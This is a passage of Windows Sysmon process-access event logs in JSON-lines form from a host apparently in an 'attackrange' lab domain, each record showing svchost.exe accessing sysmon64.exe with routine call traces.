06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 